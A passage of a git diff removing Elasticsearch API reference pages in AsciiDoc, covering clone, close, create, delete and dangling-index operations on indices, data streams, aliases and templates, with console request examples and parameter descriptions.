caches -by setting the following query parameters to `true`: - -* `fielddata` -* `query` -* `request` - -[source,console] ----- -POST /my-index-000001/_cache/clear?fielddata=true <1> -POST /my-index-000001/_cache/clear?query=true <2> -POST /my-index-000001/_cache/clear?request=true <3> ----- -// TEST[continued] - -<1> Clears only the fields cache -<2> Clears only the query cache -<3> Clears only the request cache - - - -[[clear-cache-api-specific-fields-ex]] -===== Clear the cache of specific fields - -To only clear the cache of specific fields, -use the `fields` query parameter. - -[source,console] ----- -POST /my-index-000001/_cache/clear?fields=foo,bar <1> ----- -// TEST[continued] - -<1> Clear the cache for the `foo` and `bar` field - - -[[clear-cache-api-multi-ex]] -===== Clear caches for several data streams and indices - -[source,console] ----- -POST /my-index-000001,my-index-000002/_cache/clear ----- -// TEST[s/^/PUT my-index-000001\nPUT my-index-000002\n/] - - -[[clear-cache-api-all-ex]] -===== Clear caches for all data streams and indices - -[source,console] ----- -POST /_cache/clear ----- diff --git a/docs/reference/indices/clone-index.asciidoc b/docs/reference/indices/clone-index.asciidoc deleted file mode 100644 index 65921cc6908..00000000000 --- a/docs/reference/indices/clone-index.asciidoc +++ /dev/null @@ -1,178 +0,0 @@ -[[indices-clone-index]] -=== Clone index API -++++ -Clone index -++++ - -Clones an existing index. 
- -[source,console] --------------------------------------------------- -POST /my-index-000001/_clone/cloned-my-index-000001 --------------------------------------------------- -// TEST[s/^/PUT my-index-000001\n{"settings":{"index.number_of_shards" : 5,"blocks.write":true}}\n/] - - -[[clone-index-api-request]] -==== {api-request-title} - -`POST //_clone/` - -`PUT //_clone/` - - -[[clone-index-api-prereqs]] -==== {api-prereq-title} - -To clone an index, -the index must be marked as read-only -and have a <> status of `green`. - -For example, -the following request prevents write operations on `my_source_index` -so it can be cloned. -Metadata changes like deleting the index are still allowed. - -[source,console] --------------------------------------------------- -PUT /my_source_index/_settings -{ - "settings": { - "index.blocks.write": true - } -} --------------------------------------------------- -// TEST[s/^/PUT my_source_index\n/] - -The current write index on a data stream cannot be cloned. In order to clone -the current write index, the data stream must first be -<> so that a new write index is created -and then the previous write index can be cloned. - -[[clone-index-api-desc]] -==== {api-description-title} - -Use the clone index API -to clone an existing index into a new index, -where each original primary shard is cloned -into a new primary shard in the new index. - -[[cloning-works]] -===== How cloning works - -Cloning works as follows: - -* First, it creates a new target index with the same definition as the source - index. - -* Then it hard-links segments from the source index into the target index. (If - the file system doesn't support hard-linking, then all segments are copied - into the new index, which is a much more time consuming process.) - -* Finally, it recovers the target index as though it were a closed index which - had just been re-opened. - -[[clone-index]] -===== Clone an index - -To clone `my_source_index` into a new index called `my_target_index`, issue -the following request: - -[source,console] --------------------------------------------------- -POST /my_source_index/_clone/my_target_index --------------------------------------------------- -// TEST[continued] - -The above request returns immediately once the target index has been added to -the cluster state -- it doesn't wait for the clone operation to start. - -[IMPORTANT] -===================================== - -Indices can only be cloned if they meet the following requirements: - -* The target index must not exist. - -* The source index must have the same number of primary shards as the target index. - -* The node handling the clone process must have sufficient free disk space to - accommodate a second copy of the existing index. - -===================================== - -The `_clone` API is similar to the <> -and accepts `settings` and `aliases` parameters for the target index: - -[source,console] --------------------------------------------------- -POST /my_source_index/_clone/my_target_index -{ - "settings": { - "index.number_of_shards": 5 <1> - }, - "aliases": { - "my_search_indices": {} - } -} --------------------------------------------------- -// TEST[s/^/PUT my_source_index\n{"settings": {"index.blocks.write": true, "index.number_of_shards": "5"}}\n/] - -<1> The number of shards in the target index. This must be equal to the - number of shards in the source index. - - -NOTE: Mappings may not be specified in the `_clone` request. The mappings of -the source index will be used for the target index. 
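The write block added to `my_source_index` in the prerequisites above stays in place after the clone completes, and because the target index copies the source's settings it is assumed here that `my_target_index` starts out with the same block. A minimal sketch of removing the block once cloning is done (adjust the index name to whichever index you want to make writeable again):

[source,console]
--------------------------------------------------
PUT /my_source_index/_settings
{
  "index.blocks.write": null <1>
}
--------------------------------------------------

<1> Setting `index.blocks.write` to `null` resets it to its default, so the index accepts write operations again.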
- -[[monitor-cloning]] -===== Monitor the cloning process - -The cloning process can be monitored with the <>, or the <> can be used to wait -until all primary shards have been allocated by setting the `wait_for_status` -parameter to `yellow`. - -The `_clone` API returns as soon as the target index has been added to the -cluster state, before any shards have been allocated. At this point, all -shards are in the state `unassigned`. If, for any reason, the target index -can't be allocated, its primary shard will remain `unassigned` until it -can be allocated on that node. - -Once the primary shard is allocated, it moves to state `initializing`, and the -clone process begins. When the clone operation completes, the shard will -become `active`. At that point, {es} will try to allocate any -replicas and may decide to relocate the primary shard to another node. - -[[clone-wait-active-shards]] -===== Wait for active shards - -Because the clone operation creates a new index to clone the shards to, -the <> setting -on index creation applies to the clone index action as well. - - -[[clone-index-api-path-params]] -==== {api-path-parms-title} - -``:: -(Required, string) -Name of the source index to clone. - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=target-index] - - -[[clone-index-api-query-params]] -==== {api-query-parms-title} - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=wait_for_active_shards] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=timeoutparms] - - -[[clone-index-api-request-body]] -==== {api-request-body-title} - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=target-index-aliases] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=target-index-settings] diff --git a/docs/reference/indices/close.asciidoc b/docs/reference/indices/close.asciidoc deleted file mode 100644 index f008857d366..00000000000 --- a/docs/reference/indices/close.asciidoc +++ /dev/null @@ -1,84 +0,0 @@ -[[indices-close]] -=== Close index API -++++ -Close index -++++ - -Closes an index. - -[source,console] --------------------------------------------------- -POST /my-index-000001/_close --------------------------------------------------- -// TEST[setup:my_index] - - -[[close-index-api-request]] -==== {api-request-title} - -`POST //_close` - - -[[close-index-api-desc]] -==== {api-description-title} - -You use the close index API to close open indices. - -include::{es-repo-dir}/indices/open-close.asciidoc[tag=closed-index] - - -[[close-index-api-path-params]] -==== {api-path-parms-title} - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=index] -+ -To close all indices, use `_all` or `*`. -To disallow the closing of indices with `_all` or wildcard expressions, -change the `action.destructive_requires_name` cluster setting to `true`. -You can update this setting in the `elasticsearch.yml` file -or using the <> API. - - -[[close-index-api-query-params]] -==== {api-query-parms-title} - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=allow-no-indices] -+ -Defaults to `true`. - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=expand-wildcards] -+ -Defaults to `open`. 
- -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=index-ignore-unavailable] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=wait_for_active_shards] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=timeoutparms] - - -[[close-index-api-example]] -==== {api-examples-title} - -The following example shows how to close an index: - -[source,console] --------------------------------------------------- -POST /my-index-000001/_close --------------------------------------------------- -// TEST[s/^/PUT my-index-000001\n/] - -The API returns following response: - -[source,console-result] --------------------------------------------------- -{ - "acknowledged": true, - "shards_acknowledged": true, - "indices": { - "my-index-000001": { - "closed": true - } - } -} --------------------------------------------------- diff --git a/docs/reference/indices/create-data-stream.asciidoc b/docs/reference/indices/create-data-stream.asciidoc deleted file mode 100644 index 57322f4061c..00000000000 --- a/docs/reference/indices/create-data-stream.asciidoc +++ /dev/null @@ -1,68 +0,0 @@ -[role="xpack"] -[[indices-create-data-stream]] -=== Create data stream API -++++ -Create data stream -++++ - -Creates a new <>. - -Data streams require a matching <>. -See <>. - -//// -[source,console] ----- -PUT /_index_template/template -{ - "index_patterns": ["my-data-stream*"], - "data_stream": { } -} ----- -//// - -[source,console] ----- -PUT /_data_stream/my-data-stream ----- -// TEST[continued] - -//// -[source,console] ------------------------------------ -DELETE /_data_stream/my-data-stream -DELETE /_index_template/template ------------------------------------ -// TEST[continued] -//// - -[[indices-create-data-stream-request]] -==== {api-request-title} - -`PUT /_data_stream/` - -[[indices-create-data-stream-prereqs]] -==== {api-prereq-title} - -* If the {es} {security-features} are enabled, you must have the `create_index` -or `manage` <> for the data stream. - -[[indices-create-data-stream-api-path-params]] -==== {api-path-parms-title} - -``:: -+ --- -(Required, string) Name of the data stream to create. - -Data stream names must meet the following criteria: - -- Lowercase only -- Cannot include `\`, `/`, `*`, `?`, `"`, `<`, `>`, `|`, ` ` (space character), -`,`, `#`, `:` -- Cannot start with `-`, `_`, `+`, `.` -- Cannot be `.` or `..` -- Cannot be longer than 255 bytes (note it is bytes, so multi-byte characters -will count towards the 255 limit faster) --- - diff --git a/docs/reference/indices/create-index.asciidoc b/docs/reference/indices/create-index.asciidoc deleted file mode 100644 index 90bd8f7ce69..00000000000 --- a/docs/reference/indices/create-index.asciidoc +++ /dev/null @@ -1,215 +0,0 @@ -[[indices-create-index]] -=== Create index API -++++ -Create index -++++ - -Creates a new index. - -[source,console] --------------------------------------------------- -PUT /my-index-000001 --------------------------------------------------- - - -[[indices-create-api-request]] -==== {api-request-title} - -`PUT /` - -[[indices-create-api-desc]] -==== {api-description-title} -You can use the create index API to add a new index to an {es} cluster. When -creating an index, you can specify the following: - -* Settings for the index -* Mappings for fields in the index -* Index aliases - - -[[indices-create-api-path-params]] -==== {api-path-parms-title} - -``:: -+ --- -(Required, string) Name of the index you wish to create. 
- -// tag::index-name-reqs[] -Index names must meet the following criteria: - -- Lowercase only -- Cannot include `\`, `/`, `*`, `?`, `"`, `<`, `>`, `|`, ` ` (space character), `,`, `#` -- Indices prior to 7.0 could contain a colon (`:`), but that's been deprecated and won't be supported in 7.0+ -- Cannot start with `-`, `_`, `+` -- Cannot be `.` or `..` -- Cannot be longer than 255 bytes (note it is bytes, so multi-byte characters will count towards the 255 limit faster) -- Names starting with `.` are deprecated, except for <> and internal indices managed by plugins -// end::index-name-reqs[] --- - - -[[indices-create-api-query-params]] -==== {api-query-parms-title} - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=include-type-name] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=wait_for_active_shards] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=timeoutparms] - - -[[indices-create-api-request-body]] -==== {api-request-body-title} - -`aliases`:: -(Optional, <>) Index aliases which include the -index. See <>. - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=mappings] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=settings] - -[[indices-create-api-example]] -==== {api-examples-title} - -[[create-index-settings]] -===== Index settings - -Each index created can have specific settings -associated with it, defined in the body: - -[source,console] --------------------------------------------------- -PUT /my-index-000001 -{ - "settings": { - "index": { - "number_of_shards": 3, <1> - "number_of_replicas": 2 <2> - } - } -} --------------------------------------------------- - -<1> Default for `number_of_shards` is 1 -<2> Default for `number_of_replicas` is 1 (ie one replica for each primary shard) - -or more simplified - -[source,console] --------------------------------------------------- -PUT /my-index-000001 -{ - "settings": { - "number_of_shards": 3, - "number_of_replicas": 2 - } -} --------------------------------------------------- - -[NOTE] -You do not have to explicitly specify `index` section inside the -`settings` section. - -For more information regarding all the different index level settings -that can be set when creating an index, please check the -<> section. - -[[mappings]] -===== Mappings - -The create index API allows for providing a mapping definition: - -[source,console] --------------------------------------------------- -PUT /test -{ - "settings": { - "number_of_shards": 1 - }, - "mappings": { - "properties": { - "field1": { "type": "text" } - } - } -} --------------------------------------------------- - -NOTE: Before 7.0.0, the 'mappings' definition used to include a type name. Although specifying -types in requests is now deprecated, a type can still be provided if the request parameter -include_type_name is set. For more details, please see <>. - -[[create-index-aliases]] -===== Aliases - -The create index API allows also to provide a set of <>: - -[source,console] --------------------------------------------------- -PUT /test -{ - "aliases": { - "alias_1": {}, - "alias_2": { - "filter": { - "term": { "user.id": "kimchy" } - }, - "routing": "shard-1" - } - } -} --------------------------------------------------- - -[[create-index-wait-for-active-shards]] -===== Wait for active shards - -By default, index creation will only return a response to the client when the primary copies of -each shard have been started, or the request times out. 
The index creation response will indicate -what happened: - -[source,console-result] --------------------------------------------------- -{ - "acknowledged": true, - "shards_acknowledged": true, - "index": "test" -} --------------------------------------------------- - -`acknowledged` indicates whether the index was successfully created in the cluster, while -`shards_acknowledged` indicates whether the requisite number of shard copies were started for -each shard in the index before timing out. Note that it is still possible for either -`acknowledged` or `shards_acknowledged` to be `false`, but the index creation was successful. -These values simply indicate whether the operation completed before the timeout. If -`acknowledged` is `false`, then we timed out before the cluster state was updated with the -newly created index, but it probably will be created sometime soon. If `shards_acknowledged` -is `false`, then we timed out before the requisite number of shards were started (by default -just the primaries), even if the cluster state was successfully updated to reflect the newly -created index (i.e. `acknowledged=true`). - -We can change the default of only waiting for the primary shards to start through the index -setting `index.write.wait_for_active_shards` (note that changing this setting will also affect -the `wait_for_active_shards` value on all subsequent write operations): - -[source,console] --------------------------------------------------- -PUT /test -{ - "settings": { - "index.write.wait_for_active_shards": "2" - } -} --------------------------------------------------- -// TEST[skip:requires two nodes] - -or through the request parameter `wait_for_active_shards`: - -[source,console] --------------------------------------------------- -PUT /test?wait_for_active_shards=2 --------------------------------------------------- -// TEST[skip:requires two nodes] - -A detailed explanation of `wait_for_active_shards` and its possible values can be found -<>. diff --git a/docs/reference/indices/dangling-index-delete.asciidoc b/docs/reference/indices/dangling-index-delete.asciidoc deleted file mode 100644 index 59d4d62bfb4..00000000000 --- a/docs/reference/indices/dangling-index-delete.asciidoc +++ /dev/null @@ -1,44 +0,0 @@ -[[dangling-index-delete]] -=== Delete dangling index API -++++ -Delete dangling index -++++ - -Deletes a dangling index. - -[[dangling-index-delete-api-request]] -==== {api-request-title} - -[source,console] --------------------------------------------------- -DELETE /_dangling/?accept_data_loss=true --------------------------------------------------- -// TEST[skip:Difficult to set up] - -[[dangling-index-delete-api-desc]] -==== {api-description-title} - -include::{es-repo-dir}/indices/dangling-indices-list.asciidoc[tag=dangling-index-description] - - -Deletes a dangling index by referencing its UUID. Use the -<> to locate the UUID of an index. - - -[[dangling-index-delete-api-path-params]] -==== {api-path-parms-title} - -``:: -(Required, string) -UUID of the index to delete. You can find this using the -<>. - -[[dangling-index-delete-api-query-params]] -==== {api-query-parms-title} - -`accept_data_loss`:: -(Optional, Boolean) -This field must be set to `true` in order to carry out the import, since it will -no longer be possible to recover the data from the dangling index. 
- -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=timeoutparms] diff --git a/docs/reference/indices/dangling-index-import.asciidoc b/docs/reference/indices/dangling-index-import.asciidoc deleted file mode 100644 index 11ab92b4152..00000000000 --- a/docs/reference/indices/dangling-index-import.asciidoc +++ /dev/null @@ -1,65 +0,0 @@ -[[dangling-index-import]] -=== Import dangling index API -++++ -Import dangling index -++++ - -Imports a dangling index. - -[[dangling-index-import-api-request]] -==== {api-request-title} - -[source,console] --------------------------------------------------- -POST /_dangling/?accept_data_loss=true --------------------------------------------------- -// TEST[skip:Difficult to set up] - -[[dangling-index-import-api-desc]] -==== {api-description-title} - -include::{es-repo-dir}/indices/dangling-indices-list.asciidoc[tag=dangling-index-description] - -Import a single index into the cluster by referencing its UUID. Use the -<> to locate the UUID of an index. - - -[[dangling-index-import-api-path-params]] -==== {api-path-parms-title} - -``:: -(Required, string) -UUID of the index to import, which you can find using the -<>. - -[[dangling-index-import-api-query-params]] -==== {api-query-parms-title} - -`accept_data_loss`:: -(Required, Boolean) -This field must be set to `true` to import a dangling index. Because {es} -cannot know where the dangling index data came from or determine which shard -copies are fresh and which are stale, it cannot guarantee that the imported data -represents the latest state of the index when it was last in the cluster. - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=timeoutparms] - -[[dangling-index-import-api-example]] -==== {api-examples-title} - -The following example shows how to import a dangling index: - -[source,console] --------------------------------------------------- -POST /_dangling/zmM4e0JtBkeUjiHD-MihPQ?accept_data_loss=true --------------------------------------------------- -// TEST[skip:Difficult to set up] - -The API returns following response: - -[source,console-result] --------------------------------------------------- -{ - "acknowledged" : true -} --------------------------------------------------- diff --git a/docs/reference/indices/dangling-indices-list.asciidoc b/docs/reference/indices/dangling-indices-list.asciidoc deleted file mode 100644 index 863a4d8ac7f..00000000000 --- a/docs/reference/indices/dangling-indices-list.asciidoc +++ /dev/null @@ -1,51 +0,0 @@ -[[dangling-indices-list]] -=== List dangling indices API -++++ -List dangling indices -++++ - -Lists dangling indices. - -[[dangling-indices-list-api-request]] -==== {api-request-title} - -[source,console] --------------------------------------------------- -GET /_dangling --------------------------------------------------- -// TEST[skip:TBD] - -[[dangling-indices-list-api-desc]] -==== {api-description-title} - -// tag::dangling-index-description[] -If {es} encounters index data that is absent from the current cluster -state, those indices are considered to be dangling. For example, -this can happen if you delete more than -`cluster.indices.tombstones.size` indices while an {es} node is offline. -// end::dangling-index-description[] - -Use this API to list dangling indices, which you can then -<> or <>. 
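-
-For example, the following request lists any dangling indices in the cluster.
-The response shown in the next section corresponds to a request of this form:
-
-[source,console]
---------------------------------------------------
-GET /_dangling
---------------------------------------------------
-// TEST[skip:Difficult to set up]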
- - -[[dangling-indices-list-api-example]] -==== {api-examples-title} - -The API returns the following response: - -[source,console-result] --------------------------------------------------- -{ - "dangling_indices": [ - { - "index_name": "my-index-000001", - "index_uuid": "zmM4e0JtBkeUjiHD-MihPQ", - "creation_date_millis": 1589414451372, - "node_ids": [ - "pL47UN3dAb2d5RCWP6lQ3e" - ] - } - ] -} --------------------------------------------------- diff --git a/docs/reference/indices/data-stream-stats.asciidoc b/docs/reference/indices/data-stream-stats.asciidoc deleted file mode 100644 index 42e6b561707..00000000000 --- a/docs/reference/indices/data-stream-stats.asciidoc +++ /dev/null @@ -1,214 +0,0 @@ -[role="xpack"] -[[data-stream-stats-api]] -=== Data stream stats API -++++ -Data stream stats -++++ - -Retrieves statistics for one or more <>. - -//// -[source,console] ----- -PUT /_index_template/template -{ - "index_patterns": ["my-data-stream*"], - "data_stream": { } -} - -PUT /my-data-stream/_bulk?refresh -{"create":{ }} -{ "@timestamp": "2020-12-08T11:04:05.000Z" } -{"create":{ }} -{ "@timestamp": "2020-12-08T11:06:07.000Z" } -{"create":{ }} -{ "@timestamp": "2020-12-09T11:07:08.000Z" } - -POST /my-data-stream/_rollover/ -POST /my-data-stream/_rollover/ - -PUT /my-data-stream-two/_bulk?refresh -{"create":{ }} -{ "@timestamp": "2020-12-08T11:04:05.000Z" } -{"create":{ }} -{ "@timestamp": "2020-12-08T11:06:07.000Z" } - -POST /my-data-stream-two/_rollover/ ----- -// TESTSETUP -//// - -//// -[source,console] ----- -DELETE /_data_stream/* -DELETE /_index_template/* ----- -// TEARDOWN -//// - -[source,console] ----- -GET /_data_stream/my-data-stream/_stats ----- - -[[data-stream-stats-api-prereqs]] -==== {api-prereq-title} - -* If the {es} {security-features} are enabled, you must have the -`monitor` or `manage` <> -for the data stream. - -[[data-stream-stats-api-request]] -==== {api-request-title} - -`GET /_data_stream/` - - -[[data-stream-stats-api-path-params]] -==== {api-path-parms-title} - -``:: -(Optional, string) -Comma-separated list of data streams used to limit the request. Wildcard -expressions (`*`) are supported. -+ -To target all data streams in a cluster, omit this parameter or use `*`. - -[[data-stream-stats-api-query-params]] -==== {api-query-parms-title} - -`human`:: -(Optional, Boolean) -If `true`, the response includes statistics in human-readable <>. Defaults to `false`. - - -[role="child_attributes"] -[[data-stream-stats-api-response-body]] -==== {api-response-body-title} - -`_shards`:: -(object) -Contains information about shards that attempted to execute the request. -+ -.Properties of `_shards` -[%collapsible%open] -==== -`total`:: -(integer) -Total number of shards that attempted to execute the request. - -`successful`:: -(integer) -Number of shards that successfully executed the request. - -`failed`:: -(integer) -Number of shards that failed to execute the request. -==== - -`data_stream_count`:: -(integer) -Total number of selected data streams. - -`backing_indices`:: -(integer) -Total number of backing indices for the selected data streams. - -`total_store_sizes`:: -(<>) -Total size of all shards for the selected data streams. -This property is included only if the `human` query parameter is `true`. - -`total_store_size_bytes`:: -(integer) -Total size, in bytes, of all shards for the selected data streams. - -`data_streams`:: -(array of objects) -Contains statistics for the selected data streams. 
-+ -.Properties of objects in `data_streams` -[%collapsible%open] -==== -`data_stream`:: -(string) -Name of the data stream. - -`backing_indices`:: -(integer) -Current number of backing indices for the data stream. - -`store_size`:: -(<>) -Total size of all shards for the data stream's backing indices. -This parameter is only returned if the `human` query parameter is `true`. - -`store_size_bytes`:: -(integer) -Total size, in bytes, of all shards for the data stream's backing indices. - -`maximum_timestamp`:: -(integer) -The data stream's highest `@timestamp` value, converted to milliseconds since -the {wikipedia}/Unix_time[Unix epoch]. -+ -[NOTE] -===== -This timestamp is provided as a best effort. The data stream may contain -`@timestamp` values higher than this if one or more of the following conditions -are met: - -* The stream contains <> backing indices. -* Backing indices with a <> contain -higher `@timestamp` values. -===== -==== - -[[data-stream-stats-api-example]] -==== {api-examples-title} - -[source,console] ----- -GET /_data_stream/my-data-stream*/_stats?human=true ----- - -The API returns the following response. - -[source,console-result] ----- -{ - "_shards": { - "total": 10, - "successful": 5, - "failed": 0 - }, - "data_stream_count": 2, - "backing_indices": 5, - "total_store_size": "7kb", - "total_store_size_bytes": 7268, - "data_streams": [ - { - "data_stream": "my-data-stream", - "backing_indices": 3, - "store_size": "3.7kb", - "store_size_bytes": 3772, - "maximum_timestamp": 1607512028000 - }, - { - "data_stream": "my-data-stream-two", - "backing_indices": 2, - "store_size": "3.4kb", - "store_size_bytes": 3496, - "maximum_timestamp": 1607425567000 - } - ] -} ----- -// TESTRESPONSE[s/"total_store_size": "7kb"/"total_store_size": $body.total_store_size/] -// TESTRESPONSE[s/"total_store_size_bytes": 7268/"total_store_size_bytes": $body.total_store_size_bytes/] -// TESTRESPONSE[s/"store_size": "3.7kb"/"store_size": $body.data_streams.0.store_size/] -// TESTRESPONSE[s/"store_size_bytes": 3772/"store_size_bytes": $body.data_streams.0.store_size_bytes/] -// TESTRESPONSE[s/"store_size": "3.4kb"/"store_size": $body.data_streams.1.store_size/] -// TESTRESPONSE[s/"store_size_bytes": 3496/"store_size_bytes": $body.data_streams.1.store_size_bytes/] \ No newline at end of file diff --git a/docs/reference/indices/delete-alias.asciidoc b/docs/reference/indices/delete-alias.asciidoc deleted file mode 100644 index 817bd95a103..00000000000 --- a/docs/reference/indices/delete-alias.asciidoc +++ /dev/null @@ -1,48 +0,0 @@ -[[indices-delete-alias]] -=== Delete index alias API -++++ -Delete index alias -++++ - -Deletes an existing index alias. - -include::{es-repo-dir}/glossary.asciidoc[tag=index-alias-desc] - -[source,console] ----- -DELETE /my-index-000001/_alias/alias1 ----- -// TEST[setup:my_index] -// TEST[s/^/PUT my-index-000001\/_alias\/alias1\n/] - -[[delete-alias-api-request]] -==== {api-request-title} - -`DELETE //_alias/` - -`DELETE //_aliases/` - - -[[delete-alias-api-path-params]] -==== {api-path-parms-title} - -``:: -(Required, string) -Comma-separated list or wildcard expression of index names -used to limit the request. -+ -To include all indices in the cluster, -use a value of `_all` or `*`. - -``:: -(Required, string) -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=index-alias] -+ -To delete all aliases, -use a value of `_all` or `*`. 
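-
-For example, the following request uses the `*` wildcard described above to
-remove every alias attached to `my-index-000001`. The index name is only
-illustrative; any alias attached to it is removed:
-
-[source,console]
-----
-DELETE /my-index-000001/_alias/*
-----
-// TEST[setup:my_index]
-// TEST[s/^/PUT my-index-000001\/_alias\/alias1\n/]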
- - -[[delete-alias-api-query-params]] -==== {api-query-parms-title} - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=timeoutparms] diff --git a/docs/reference/indices/delete-component-template.asciidoc b/docs/reference/indices/delete-component-template.asciidoc deleted file mode 100644 index e559ddc3911..00000000000 --- a/docs/reference/indices/delete-component-template.asciidoc +++ /dev/null @@ -1,52 +0,0 @@ -[[indices-delete-component-template]] -=== Delete component template API -++++ -Delete component template -++++ - -Deletes an existing component template. - -//// -[source,console] --------------------------------------------------- -PUT _component_template/template_1 -{ - "template": { - "settings": { - "index.number_of_replicas": 0 - } - } -} --------------------------------------------------- -// TESTSETUP -//// - -[source,console] --------------------------------------------------- -DELETE _component_template/template_1 --------------------------------------------------- - - -[[delete-component-template-api-request]] -==== {api-request-title} - -`DELETE /_component_template/` - - -[[delete-component-template-api-desc]] -==== {api-description-title} - -Use the delete component template API to delete one or more component templates -Component templates are building blocks for constructing <> -that specify index mappings, settings, and aliases. - -[[delete-component-template-api-path-params]] -==== {api-path-parms-title} - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=component-template] - - -[[delete-component-template-api-query-params]] -==== {api-query-parms-title} - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=timeoutparms] diff --git a/docs/reference/indices/delete-data-stream.asciidoc b/docs/reference/indices/delete-data-stream.asciidoc deleted file mode 100644 index d2e1f7401c0..00000000000 --- a/docs/reference/indices/delete-data-stream.asciidoc +++ /dev/null @@ -1,56 +0,0 @@ -[role="xpack"] -[[indices-delete-data-stream]] -=== Delete data stream API -++++ -Delete data stream -++++ - -Deletes one or more <> and their backing -indices. See <>. - -//// -[source,console] ----- -PUT /_index_template/template -{ - "index_patterns": ["my-data-stream*"], - "data_stream": { } -} - -PUT /_data_stream/my-data-stream ----- -// TESTSETUP -//// - -[source,console] ----- -DELETE /_data_stream/my-data-stream ----- - -//// -[source,console] ----- -DELETE /_index_template/template ----- -// TEST[continued] -//// - -[[delete-data-stream-api-request]] -==== {api-request-title} - -`DELETE /_data_stream/` - -[[delete-data-stream-api-prereqs]] -==== {api-prereq-title} - -* If the {es} {security-features} are enabled, you must have the `delete_index` -or `manage` <> for the data stream. - - -[[delete-data-stream-api-path-params]] -==== {api-path-parms-title} - -``:: -(Required, string) -Comma-separated list of data streams to delete. -Wildcard (`*`) expressions are supported. diff --git a/docs/reference/indices/delete-index-template-v1.asciidoc b/docs/reference/indices/delete-index-template-v1.asciidoc deleted file mode 100644 index 3ad0a0e347c..00000000000 --- a/docs/reference/indices/delete-index-template-v1.asciidoc +++ /dev/null @@ -1,52 +0,0 @@ -[[indices-delete-template-v1]] -=== Delete index template API -++++ -Delete index template (legacy) -++++ - -IMPORTANT: This documentation is about <>, which are deprecated and will be replaced by the composable -templates introduced in {es} 7.8. For information about composable templates, -see <>. 
- -Deletes a legacy index template. - -//// -[source,console] --------------------------------------------------- -PUT _template/my-legacy-index-template -{ - "index_patterns" : ["te*"], - "settings": { - "number_of_shards": 1 - } -} --------------------------------------------------- -// TESTSETUP -//// - -[source,console] --------------------------------------------------- -DELETE /_template/my-legacy-index-template --------------------------------------------------- - - -[[delete-template-api-v1-request]] -==== {api-request-title} - -`DELETE /_template/` - - -[[delete-template-api-v1-path-params]] -==== {api-path-parms-title} - -``:: -(Required, string) -Comma-separated list of legacy index templates to delete. Wildcard (`*`) -expressions are supported. - - -[[delete-template-api-v1-query-params]] -==== {api-query-parms-title} - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=timeoutparms] diff --git a/docs/reference/indices/delete-index-template.asciidoc b/docs/reference/indices/delete-index-template.asciidoc deleted file mode 100644 index 65516d828bb..00000000000 --- a/docs/reference/indices/delete-index-template.asciidoc +++ /dev/null @@ -1,54 +0,0 @@ -[[indices-delete-template]] -=== Delete index template API -++++ -Delete index template -++++ - -Deletes an <>. - -//// -[source,console] ----- -PUT /_index_template/my-index-template -{ - "index_patterns" : ["te*"], - "template": { - "settings": { - "number_of_shards": 1 - } - } -} ----- -// TESTSETUP -//// - -[source,console] ----- -DELETE /_index_template/my-index-template ----- - - -[[delete-template-api-request]] -==== {api-request-title} - -`DELETE /_index_template/` - - -[[delete-template-api-desc]] -==== {api-description-title} - -Use the delete index template API to delete one or more index templates. -Index templates define <>, <>, -and <> that can be applied automatically to new indices. - - -[[delete-template-api-path-params]] -==== {api-path-parms-title} - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=index-template] - - -[[delete-template-api-query-params]] -==== {api-query-parms-title} - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=timeoutparms] diff --git a/docs/reference/indices/delete-index.asciidoc b/docs/reference/indices/delete-index.asciidoc deleted file mode 100644 index 19112da63d9..00000000000 --- a/docs/reference/indices/delete-index.asciidoc +++ /dev/null @@ -1,60 +0,0 @@ -[[indices-delete-index]] -=== Delete index API -++++ -Delete index -++++ - -Deletes an existing index. - -[source,console] --------------------------------------------------- -DELETE /my-index-000001 --------------------------------------------------- -// TEST[setup:my_index] - - -[[delete-index-api-request]] -==== {api-request-title} - -`DELETE /` - - -[[delete-index-api-path-params]] -==== {api-path-parms-title} - -``:: -+ --- -(Request, string) Comma-separated list or wildcard expression of indices to -delete. - -In this parameter, wildcard expressions match only open, concrete indices. You -cannot delete an index using an <>. - -To delete all indices, use `_all` or `*` . To disallow the deletion of indices -with `_all` or wildcard expressions, change the -`action.destructive_requires_name` cluster setting to `true`. You can update -this setting in the `elasticsearch.yml` file or using the -<> API. - -NOTE: You cannot delete the current write index of a data stream. To delete the -index, you must <> the data stream so a new -write index is created. 
